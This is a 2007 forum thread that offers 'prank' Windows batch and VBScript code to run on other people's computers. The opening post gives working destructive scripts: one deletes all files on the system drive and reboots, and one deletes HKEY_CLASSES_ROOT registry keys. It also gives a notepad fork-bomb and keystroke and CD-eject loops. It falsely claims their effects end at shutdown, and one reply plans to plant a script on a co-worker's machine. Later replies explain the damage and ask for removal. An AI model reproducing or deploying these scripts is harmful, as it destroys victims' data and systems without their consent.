GaMeRrEmAg
Dec 8 2007, 11:46 PM
The CMD Codes- to use, open up notepad and copy and paste the code into the notepad. name the file (anyname).vbs (to make a .vbs file, when u save it or save as, it will ask u for a name and which type u want it, so choose all file then just name it as a .vbs file) then just click on the file u just made *NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer -The blue screen of Death [this might be dangerous] *The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again CODE @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 -Stupidity Shutdown *This pops up a funny message then will shutdown the computer CODE @echo off msg * Fatal system error due to admin stupidity! shutdown -c "Error! You are too stupid!" -s -t 10 -Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] *This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM) CODE @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE -Endless Notepads *This will pop up endless notepads until the computer freezes and crashes* CODE @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top -Crazy caps lock *This constantly turns caps lock on and off really fast continuously* CODE Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop -Endless Enter *This constantly makes it so the enter button is being pressed continuesly* CODE Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop -Endless Backspace *This makes it so the backspace key is constantly being pressed* CODE MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop -Popping CD Drives *This will make the CD drives constantly pop out* CODE Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop
Comment/Reply (w/o sign-up)
elaks
Dec 9 2007, 12:21 PM
Unless this is copied from another source you've managed to categorize things quite nicely. Again- I'd put a really big warning about the Registry Key deleting one; something with big red text.. I've never heard of some of these before. The reoccuring backspace sounds like fun, and the forced blue screen could freak an experienced computer user out. I will most certainly bookmark this topic for future reference. It's a shame so many of my friends use Macs.  Also, this is the wrong section.
Comment/Reply (w/o sign-up)
thejestergl
Dec 9 2007, 05:50 PM
I have to admit that this is a pretty nifty thing to have, and good to know that it goes away when they shut off their computer (so you aren't a COMPLETE jerk). Some of the things you posted are more annoyances which is better then just messing up their computer completely. I think there should be a limit for how far you can go, and I think this one just hits the line so it didn't go too far. Personally I like the one that will constantly open the CD drive because I know that can get really annoying haha. Then again having the backspace key constantly pressed down could be rather bad. I know that I would just die if I had a whole essay typed up and then re-opening it and find that my work got backspaced out xD! Though I know you can just not save it, it is still funny. I think that what you have written is actually not really for someone you hate or seek revenge for, but rather a good prank. At least for most of the code it is! If it does no permanent damage I don't see how this can be all in good fun, especially since most of these again aren't really bad for the computer, but rather annoying to the user. I think I might use some of these for an april fools joke hehe. Thanks a million! <3 -Jester
Comment/Reply (w/o sign-up)
cangor
Dec 10 2007, 01:45 AM
Man, that's completely diabolical. Like thejestergl says though, it's not really for someone you hate. If you hate someone then you tell them that, and tell them that they're a jerk, and they're not worth the dirt on your shoes or whatever, but revenge is never a good idea. These would definately make for a good prank on a friend though. I like the one about the constantly popping CD drives.
Comment/Reply (w/o sign-up)
Saint_Michael
Dec 10 2007, 02:49 AM
Some of them are interesting and I have a funny feeling those could be used in payloads for viruses, worms, trojans etc etc. Although these would be good to play on you friends, well not the file deleting, OS re-installation; but the CD ROM drive and the keyboard tricks would be funny because then they will start yelling at the computer companies on the phone about their computer's screwing up  .
Comment/Reply (w/o sign-up)
FLaKes
Dec 10 2007, 08:13 AM
Cool, I am going to try the one with the popping cd tray right now on my co workers computer, I just need the network name so I can leave him this little present. LOL.... hehe
Comment/Reply (w/o sign-up)
Galahad
Dec 10 2007, 09:37 AM
First off, these 4 are not related to VBS, or VBScript, in any way... Code this user posted in the following 4 "pranks" is actually a command intrepreter code, that is written in old fashioned batch files, or .BAT files... These were used in DOS days, to speed up certain tasks that repeated often, a sort of equivalent of the maros... QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM)  *NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. This one is a lie, except in case of BAT-1 code, that I will elaborate on later in this post... I believe this user has posted truely malicious code here, and that these dangerous ones should be removed, and the true prank ones left here... BAT-1QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM)  CODE @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 This one will actually mess Windows up! It will delete ALL the files from your system hard drive, or system partition! Command DEL is used (naturally) to delete files, %systemdrive% tells this command to wipe out everything from the partition you have your windows installed to (for example, C:), \*.* tells it to wipe every file it finds, and the switches /F /S /Q tell the command to force the deletion of read-only files, to wipe out every sub-directory, and to be quiet about it, respectively... This part is not at all a prank, and I don't recommend anyone trying this one... Ever... BAT-2QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM)  -Stupidity Shutdown *This pops up a funny message then will shutdown the computer CODE @echo off msg * Fatal system error due to admin stupidity! shutdown -c "Error! You are too stupid!" -s -t 10 Ok, this one really does send the message, but it sends this message to everyone on the network... MSG command is used to send short text messages between two or more computers on the network, mainly local network... MSG * will send the message to all the computers in the network... Not really funny, but hey... It's at least not malicious... BAT-3QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM)  -Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] *This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM) CODE @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE This one is just as bad, as the first one... It wipes out entire HKEY_CLASSES_ROOT registry section, and effectively kills your Windows... And again, it's a command-prompt style batch file... But, none the less, it's very malicious, and should NOT be tried... BAT-4QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM)  -Endless Notepads *This will pop up endless notepads until the computer freezes and crashes* CODE @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top This one is not malicous, as it will only start notepads, until you run out of memory... Then windows will crash... Can be tried on someone I guess... It appears to me, that this user has copied this code from some site, and has no real coding experience, and is, what would be called a wannabe-hacker... Probably some kid, with too much time on his hands... I would STRONGLY recommend that you avoid using BAT-1 and BAT-3 codes, as they WILL kill your computer, and you won't be able to revive your system without reinstallation... BAT-1 will destroy ANY file found on your system hard drive, and probably all files in your My Documents folder, as this folder is also stored on your system hard drive or partition... I would urge the moderators to remove BAT-1 and BAT-3 codes, as they pose a big risk for users that do not know what they do... And I would recommend warning this user about posting such content... This could be very harmfull to this community...
Comment/Reply (w/o sign-up)
rayzoredge
Dec 10 2007, 04:28 PM
QUOTE(Galahad @ Dec 10 2007, 04:37 AM)  Thanks for clarifying that. When OP mentioned them as VBS scripts, I was wondering why VBS looked so much like command-line batch files... I thought netsend was to send messages over the network...
Comment/Reply (w/o sign-up)
Liam_CF
Dec 10 2007, 05:34 PM
Thanks I'll probably use on of these for april fools or something.
Comment/Reply (w/o sign-up)
GaMeRrEmAg
Dec 10 2007, 08:23 PM
 well, i have tried a few of these and they seem to be in order. the shutdown one does NOT delete the hard disk. i have ones tht do though >=) i typed up vbs at the top because some (crazy caps, textpad, ect) wont work on some computers. damn typing with the ps3 controller is annoying
Comment/Reply (w/o sign-up)
iGuest
Aug 30 2009, 03:34 PM
good pranks
Nasty Windows Tricks Using Vbs Codes
I think some of these codes for vbs scripts are a bit too dangerous and malicous I ave got a good prank 4 april fools jokes or if u jst want to play a prank make a new shortcut and type
Shutdown -s -t 50 -c "trojan virus activated"
.It is good .You can change the txt and time to watever you want but I like to use trojan virus activated . Enjoy !
It jst shuts down your computer
-reply by il penquin
Comment/Reply (w/o sign-up)
iGuest
Oct 31 2008, 03:24 PM
Agreed, original poster was a clueless wannabe...
Nasty Windows Tricks Using Vbs Codes
Replying to GalahadI hit this page while stumbling, and read the post out of curiousity. On reading the very first bit of "code" (term used loosely) he posted, I knew the guy didn't have the slightest clue what he was talking about. From that point on, I just read out of a morbid curiosity to see how idiotic things got from there. Maybe he just thought it would be funny to try to trick people into trashing their PCs? Regardless, you're right that 1 & 3 should be removed from the posting. -reply by Mark
Comment/Reply (w/o sign-up)
iGuest
Oct 10 2008, 10:15 PM
The second I saved this file as a .Vbs, avast antivirus popped up saying virus detected. Looks like avast really works.
Comment/Reply (w/o sign-up)
iGuest
May 15 2008, 11:42 AM
Open notepad and type in: Start boo.Bat Now save it as boo.Bat Now close notepad and double click on the bat file -reply by viper
Comment/Reply (w/o sign-up)
iGuest
May 11 2008, 04:46 AM
(some of)These codes are too malicious for a prank or anything else! In command line and batch files *.* is a certian wildcard which would basically mean [everything]. * is used to replace a group of letters so *.* would mean everything in every extension (everything). Combine it with the DEL (delete) command and that would delete everything. This guy messing with reistry and deletion could totally screw up your computer!
Comment/Reply (w/o sign-up)
Similar Topics
Keywords : nasty, windows, tricks, vbs, codes, blue, screen, death, instant, shutdown, endless, notepads
- Please Help To Resolve This Problem In Of Windows
(1)
After 18 Years Windows 3.1 Is Officially Retired
(16) Wow is all I have to say just because of the fact I thought they gave up giving licenses for this
old, outdated, slow, useless operating system. I guess not as November 1st, 2008 Windows 3.1 is
officially dead and the funny thing is didn't support for this operating system end at windows
98 or something like that? Either way I wonder when they will stop issuing liscenses for 95, 98,
ME, 2000 because those operating systems are just as outdated and can not even run most of the web
technologies that ae out there today and so if your going to cut off support you might....
Linux Ubuntu Vs Windows Vista
Discussion on which OS is better, Vista or Ubuntu. (40) A few weeks ago, i downloaded a live-cd for Linux Ubuntu 8.4 and booted it from the cd. It was not
as bad as i had thought (although i had trouble booting /dry.gif" style="vertical-align:middle"
emoid=" ) but REALY SLOW. So i installed Ubuntu and was pretty nice /smile.gif"
style="vertical-align:middle" emoid=":)" border="0" alt="smile.gif" /> . From my experience from
vista and ubuntu i have to say vista still stands number for me. Which one do you think is better?....
Top 10 Things To Look Forward To In Windows 7
(8) This post is based on an article printed by lifehacker.com in which I thought I bring my opinions
about this article. 10. Side bar Thank god I would think 99% of the world would agree that this
was the most useless feature and a memory waster as well, because every time I started up vista the
memory would spike when it was loading that sidebar and besides I close it most of the time anyway
because of how useless it really was. 9. Old school programs get the respect they deserve To be
quite honest I am glad they are at least updating these programs, even if it is just....
Change 'open With' In Regedit
for Windows XP (11) Hi there. I have a problem with File Types on my PC: xls files are opened by default with Open
Office, but I want to open them with Excel. I right click the file and I choose Open With, but Excel
is not in those programs; so I select Choose Program; again Excel is not in the Recommended Programs
nor in the Other Programs. I click Browse and I go to where Excel is installed and I select the exe,
but after I click Ok nothing happens, I mean Excel doesn't appear in Recommended Programs like
it should. So my question is this: is there any way to force xls files to open ....
Windows Vista: Disabling Login Screen
officially not permitted, is there a way around? (7) Hi all, I'm sure some of you gave a thought to this, why does Vista always show the login
screen when booting? In XP there was an option somewhere in control panel to "assume this user
always login to the computer" or something like that. That way if you used the same user 99% of the
time and wanted to keep a second user as say an administrator you could do so by setting that
option. If you ever wanted to switch to the "hidden" user you could do so with Log Off or Switch
User in Start Menu. Now this is not possible in Vista, the user is given the login screen no ma....
Help Me Please! Windows 98 - Dont Know...
(5) At me such question I can not change the menu in Windows, it looks on new why that.... Help to
adjust... At me of a Window 98....
Windows Xp Sp2 Restarting After Some Time
(10) Hi , I dont know what happened but My system restarts after a few Minutes (at max an hour). Can
someone guess what might be wrong. It displays a System Shutdown Timer (initiated by
Administrator) and then restarts after 60 sec. This is an SP2 so I dont think its a blaster. I
have a ZoneAlarm Security Suite and it didn't detect anything. I even Scanned my Windows folder
from Kaspersky using my Second OS (Vista) but that also didn't detect anything . .. Any guesses
??....
Windows Explorer Randomly Crashing
(7) Okay, I've had Vista for a few months now but just recently my Windows Explorer has been having
problems. It says "Windows Explorer has stopped working" and then I click the option restart the
program. I usually have 2 - 5 Explorer windows open and when I click restart the program it closes
all of my windows and opens up My Documents. I usually get this error one or two times a day but
I'm not doing anything wrong. Is this error only happening to me or has it happened to anyone
else. Thanks. ....
Windows Vista Sp1
Does it make Vista a viable OS to upgrade to? (14) Has anyone actually been satisfied with the release of SP1 for Vista? Does it solve the problems
that we've all griped about? Overview of Windows Vista SP1 From what I'm reading
from that document, I'm actually surprised, appalled, and in a way, now wondering if Vista can
actually be an upgrade. I laughed at: QUOTE Enhances support for high-definition (HD)
drives by adding new icons and labels that identify HD-DVD and Blu-ray drives as HD drives.
That's awesome. I never knew the HD drive that I bought was an HD until SP1. /rolleye....
How Do I Change The Default Windows Font Size?
Without changing DPI, of course. (7) I know there's an option in Ubuntu to change all the font sizes of the general system, the
windows, and etc. Now I'm trying to do this in Windows. I've changed everything about
the windows except for the general system size. How do I do this?....
Why Do Alot Of People Hate Windows Vista?
(40) personally, i prefer it the only thing i don't like is that i sometimes have trouble playing
older pc games EDIT:sorry, just relized i'm prlly in the wrong forum....
Installing Windows Xp On A Sata Enabled Desktop/notebook Computer.
How to ...... (8) If you bought a brand new computer within the past few years, you might have noticed that your
computer shipped with a Serial ATA (SATA) controller instead of the convetional Enhanced IDE (EIDE)
controller. The reason for this is to enhance performance and power management as SATA controllers
and their supported Hard Disk Drives have a higher data transfer speed against their IDE
counterparts. And they are supposed to use lesser amount of power thereby saving you more battery
life in your notebook's battery or UPS as the case may be. If you want to install and run ....
Create An Undeletable Shortcut Using Registry(windows)
Add undeletable shortcut in desktop and inside "My Computer" (2) Create an Undeletable shortcut in Desktop and inside "My Computer"!
*************************************************************************** DISCLAIMER: The
following contains registry edits. If done improperly can cause strange behaviour, and at worst,
could even entirely corrupt your Windows Installation, requiring you to reinstall Windows. I cannot
be held for any damage you may cause to your system as a result of taking any action suggested in
the following article. *************************************************************************** ....
Windows Xp Doesn't Recognize Your Computer's Dvd-rom Or Cd-rom?
(9) Windows XP doesn't recognize your computer's DVD-ROM or CD-ROM? Some times after
installing Microsoft Windows XP, it doesn't recognize your DVD-ROM or CD-ROM. To resolve this
problem do following; 1- Click Start Menu > Run > type "regedit" and press OK to open Windows
Registry Editor. 2- Go to following Address: CODE
H_L_M\System\CurrentControlSet\Control\Class\{3d36e965-e325-11ce-bfc1-08002be10318} 3- In
Registry menu select "Export Registry File" to make a Backup from your registry entry. 4- If there
is "UpperFilters" or " LowerFilters" keys, d....
How To Disable Keyboard
Windows XP (5) How to disable keyboard In Windows XP 1- Go to StartMenu > Run and type "regedit" and press OK to
run Windows Registry Editor. 2- Go to following address: CODE HKEY_CURRENT_USER\Control
Panel\Accessibility\Keyboard\ Response 3- Create a new String Value and name it as Flags , then
give it value of 127 4- Now Go to following address: CODE
HKEY_CURRENT_USER\Controlpanel\Accessibility\SoundSentry 5- Create a new String Value and name it
as Flags , then give it value of 3 6- Create a new String Value and name it as WindosEffect, then
give it value of 3 7- Cl....
How To Install Microsoft Windows Xp Automatically!
(6) How to install Microsoft Windows XP automatically As you know, during installing Microsoft
Windows XP, setup asks you several questions about your installation drive, windows serial number,
your language, administrator password, local time zone and … . So that you should sit and answer
above questions. But there is a small tool in Microsoft Windows CD , let's you answer these
questions before installing Windows. 1- Put Windows XP CD/DVD in the CD/DVD in your CD/DVD ROM and
go to following folder: X:\Support\tools\ 2- Copy deploy.cab in your Hard Drive and then ex....
Changing The Windows Xp Splash Screen
another quick tutorial (11) First make create 16 bit 640*480 image and save it as boot.bmp in 'c:\windows' directory
Click Start|Run and type c:\boot.ini. The file opens in Notepad. Look for an entry similar to
this. CODE "multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"
/noexecute=optin /fastdetect" Add /noguiboot /bootlogo at the end of the line so that it looks
like this. CODE "multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP
Professional" /noexecute=optin /fastdetect /noguiboot /bootlogo" We add the /noguiboot switc....
How To Reset, Retrieve Windows Xp User Password ?
Its a simple methord ! Just read it ! (30) IF U R IN TROUBLE ? LOST YOUR XP LOGIN USERNAME AND PASSWORD ......
===================================================================== You can get in to anu
user account if you are using windows administrative account its a simple methord ! STEP 1 .
CLCIK - START MENU ! STEP 2 . TAKE " RUN " STEP 3 . RUN " mmc " - M icrosoft M
anagement C onsole There u get a new NEW WINDOW - name Console STEP 4. Click FILE TAB STEP
5. TAKE " ADD / REMOVE " STEP 6. Click " Add.. " - (Child window) STEP 7. " Add Local
User and Gro....
Pros And Cons Of Mac, Windows, And Linux
This is not a what's better topic, it's a pros and cons (40) Before i start i want to make sure you understand this is not a what OS is better this is a what is
better at certain things and your reasons why. I would also like to know more about Linux because
i'm slightly confused on it. Will it mess my computer up if i install it, dont like it, and
uninstall it? OK on with the topic. I own a Mac and work on one for many hours a day, but had
always used a Windows based system since well i was 5 and i remember my father using DOS to run Duke
Nukem haha. So i know my way around it. Here is my Pros and Cons list Windows: Pros....
Win Xp Freeze At Login Screen
(5) When I start up the computer I get to the login screen and click on the appropriate account. Three
out of four times the keyboard and mouse will freeze and I am forced to reboot. This may happen
three or four times but eventually I can start up windows. Anyone have a clue as to why this
happens? Thank for your help. CRG....
Microsoft Warns Users Of Pirated Windows Os
with a Desktop Message (36) QUOTE Hundreds of thousands, if not millions, of local PC users running pirated Windows
operating systems will soon face the shame of being reminded of their illegal action every time they
switch on their machines. The feature will be added to the operating system by Microsoft Corp from
tomorrow and cannot be erased. It will nag the guilty users and can be awkward if it shows up on
corporate PCs." QUOTE The anti-piracy move is being kicked off in five countries tomorrow –
the United States, Britain, New Zealand, Australia and Malaysia. Full Story: http....
Error Installing Windows Xp -error 7 Ntkrnlmp.exe
(12) i have tried to install windows xp on my pc and i get an error right after it ask at the bottom of
the screen to press f2 to restore an error pops up saying FILE \$win_nt$.~bt\NTKRNLMP.EXE cannot be
open error 7 setup cannot complete and has to close i have had windows xp on the pc before so i
know its compatible but i used a different version of windows before ,this tinme im using a new one
and i get this error i seem to find no solution anywhere about how to resolve this and I was
wondering if possible theres something i need to do,I am not to smart with computers s....
Windows Xp Freezes At Welcome Screen
(57) today i start my pc in windows xp and found that xp freezes at welcome screen. then i try to boot in
safe mode but the problem persisits then i again try in last good configuration setting but it
doesn't help so i hav to reinstall my xp plz any body hav solution for this so that i do not hav
to reinstall my xp for this problem as i get this problem oftenly. thanks....
Windows Won't Boot Up
Getting error message appears with hal.dll or ntosknl.exe no (12) Can anyone help with this issue? I have at least three machines at work that are currently booting
up to a blank screen with either hal.dll or ntosknl.exe missing error. The machines are running
Windowa 2000 pro. I have been able to get them back up and running, bu t I am a little concerned
that there maybe a virus. However, I have made sure my AntiVirus software has been updated and a
full scan has been run, and no virus has been detected. I have run spyware detecting software as
well, and nothing unusual seems to appear. The machines are running ok so far, but I am wor....
60 Seconds Countdown That Shutdown The Pc
Problem in computer that automatically restart COMPUTER (18) I encountered this bugs or what 6 months ago, untill now still gives me a headache. I don't
know if it is a virus, problem in windows services or what but honestly I cant fix it. What it does
is, it's gives you an error message saying blahh blahh...with a timer of 60 seconds, when the
timer reached 0 it will automatically restart your computer.....
Windows Xp And Dos Multiboot
how?? (13) Question to you all, I have a computer running windows XP, now I want to add a "real" DOS
enviroment on the computer (not cmd or dosbox or something like that). So I thought dualboot will
do the trick, but the problem is, if I go on and install dos on my free harddisk, I will have a
problem cause it f*cks up my boot process and windows xp will not start anymore. That I dont want!
Anyone got an idea on how i can install dos so I can multiboot between windows xp and dos without
formatting my windows drive, install dos and then reinstall windows? Any help would be greatl....
Skinning Windows Xp
Do you know how to skin ? (7) Okay, I've heard alot about skinning Windows XP with programs made specially for skinning. But
these programs somehow lags my system and I'm not quite happy about it... Anyone knows how to
skin Windows XP without using using software like DesktopX or ThemeXP etc. ? Just skinning it
manually including icon sets too......
Windows XP Built in Applications ...
some of them! (2) Some of Windows XP Built in Applications: 1. sysedit.exe (System Configuration Editor ) 2.
perfmon.exe (System Monitor ) 3. eudcedit.exe (Private character editor) 4. drwtsn32.exe (Dr
Watson) 5. dxdiag.exe (DirectX diagnosis) 6. telnet.exe (Microsoft Telnet Client) 7. iexpress.exe
(IExpress Wizard - Create self-extracting / self-installing package) 8. mobsync.exe (Microsoft
Synchronization Manager) 9. cleanmgr.exe (Disk Cleanup) 10. odbcad32.exe (ODBC Data Source
Administrator) 11. packager.exe (Object Packager) 12. mplay32.exe (Windows Media Player 5.1) 13. wi....
Windows Xp Lite?
(19) I heard that in some other country for some reason came out with a windows xp lite. I think the
country was Australia, and the new version is suppose to have better spyware protection, virus and
IE protection and run faster and all that good stuff. If you know what im talking about or have any
other information please post it here.....
Looking for nasty, windows, tricks, vbs, codes, blue, screen, death, instant, shutdown, endless, notepads
|
Searching Video's for nasty, windows, tricks, vbs, codes, blue, screen, death, instant, shutdown, endless, notepads
See Also,
|
advertisement
|
|